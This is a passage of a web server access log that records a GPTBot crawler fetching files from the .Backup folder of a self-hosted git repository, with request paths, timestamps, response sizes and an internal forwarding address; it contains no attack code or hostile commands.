"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:14:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" +[17/Feb/2026:14:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" +[17/Feb/2026:14:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12784] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:14:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12782] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:14:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets" +[17/Feb/2026:14:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets" +[17/Feb/2026:14:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10756] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" +[17/Feb/2026:14:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" +[17/Feb/2026:14:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10757] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" +[17/Feb/2026:14:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" +[17/Feb/2026:14:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13900] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" +[17/Feb/2026:14:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13901] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" +[17/Feb/2026:14:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components" +[17/Feb/2026:14:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12483] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" +[17/Feb/2026:14:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12481] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" +[17/Feb/2026:14:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" +[17/Feb/2026:14:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" +[17/Feb/2026:14:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" +[17/Feb/2026:14:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services" +[17/Feb/2026:14:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services" +[17/Feb/2026:14:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" [Client 74.7.227.38] [Length 11074] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:14:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" [Client 74.7.227.38] [Length 11075] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:14:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/App.tsx" +[17/Feb/2026:14:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" +[17/Feb/2026:14:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/types.ts" +[17/Feb/2026:14:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" +[17/Feb/2026:14:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11299] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:14:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11884] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:14:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11299] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:14:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" +[17/Feb/2026:14:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" [Client 74.7.227.38] [Length 10021] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" +[17/Feb/2026:14:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11884] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:14:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" +[17/Feb/2026:14:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" [Client 74.7.227.38] [Length 10022] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" +[17/Feb/2026:14:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.gitignore" +[17/Feb/2026:14:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" +[17/Feb/2026:14:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/README.md" +[17/Feb/2026:14:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10382] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" +[17/Feb/2026:14:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11211] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" +[17/Feb/2026:14:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10382] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" +[17/Feb/2026:14:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" +[17/Feb/2026:14:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" +[17/Feb/2026:14:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" +[17/Feb/2026:14:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" +[17/Feb/2026:14:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11211] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" +[17/Feb/2026:14:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md" +[17/Feb/2026:14:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" [Client 74.7.227.38] [Length 12528] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" +[17/Feb/2026:14:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" [Client 74.7.227.38] [Length 12528] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" +[17/Feb/2026:14:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" [Client 74.7.227.38] [Length 21806] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html" +[17/Feb/2026:14:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" [Client 74.7.227.38] [Length 21806] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html" +[17/Feb/2026:14:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 